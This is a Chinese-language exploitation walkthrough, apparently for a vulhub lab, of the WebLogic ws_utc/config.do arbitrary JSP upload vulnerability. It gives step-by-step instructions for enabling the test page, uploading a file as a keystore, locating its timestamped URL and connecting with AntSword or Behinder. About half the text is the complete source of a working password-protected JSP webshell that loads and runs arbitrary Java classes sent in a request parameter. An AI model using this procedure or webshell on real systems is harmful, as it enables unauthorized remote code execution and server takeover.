漏洞描述
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。
漏洞影响版本
weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。
IP地址 http://192.168.xxx.xxx:7001/console //进入后台系统
用户账号密码获取
vulhub靶场默认账户是weblogic 密码查看一下logs就能找到了
在kali上执行 docker-compose logs | grep password
环境准备
进入高级配置
在此处一定要进行勾选启用web服务器测试页,勾选后下拉的最下方进行保存配置
路径: http://192.168.17.130:7001/ws_utc/config.do
当前的工作目录路径,配置完成后进行保存
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
但在此处是有坑的如果这里的配置这里最后有css,那么上传文件后,你的访问链接应该是
路径:http://localhost:7001/ws_utc/css/config/keystore/1637485345393_shell.jsp
如果没有添加/css 那么上传文件后你的链接应该是
路径:http://localhost:7001/ws_utc/config/keystore/1637485345393_shell.jsp
安全->添加->浏览
上传成功之后,查看返回的数据包,其中有时间戳
可以通过查看源代码的方式或者使用Burp抓包进行获取
获取权限
获取权限的路径 http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]
我们可以使用蚁剑或者冰蝎进行连接来获取权限
http://192.168.17.130:7001/ws_utc/css/config/keystore/1666276503565_shell.jsp
shell.jsp 文件 (jsp一句话木马)
【连接密码】: passwd
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>